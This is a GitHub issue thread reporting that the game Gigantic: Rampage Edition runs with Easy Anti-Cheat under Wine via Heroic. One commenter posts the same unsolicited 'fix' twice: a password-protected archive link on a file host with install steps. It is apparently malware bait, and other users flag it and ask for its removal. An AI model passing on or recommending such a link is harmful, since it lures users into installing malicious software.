### ISSUE TITLE
Request Gigantic: Rampage Edition

### ISSUE THREAD

**Issue by MrNessuno** [AreWeAntiCheatYet/AreWeAntiCheatYet#1713]
### Game Title

Gigantic: Rampage Edition

### Game Website

https://www.epicgames.com/store/product/gigantic-rampage-edition-03f532

### Anti-Cheat Software

Easy Anti-Cheat

### Status of the Anti-Cheat

👍 Running

### Tinkering Steps

Installed via Heroic Game Launcher (from EpicGames) with latest Wine-GE

### Proof of Mention

I tried it, no other sources

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by MrNessuno** [comment]
@Starz0r please remove these comments, not sure about it but sounds like some sort of virus

**Comment by Schutzend** [comment]
delete this link 
![image](https://github.com/user-attachments/assets/9216b064-bc75-43a2-9367-036d37102329)
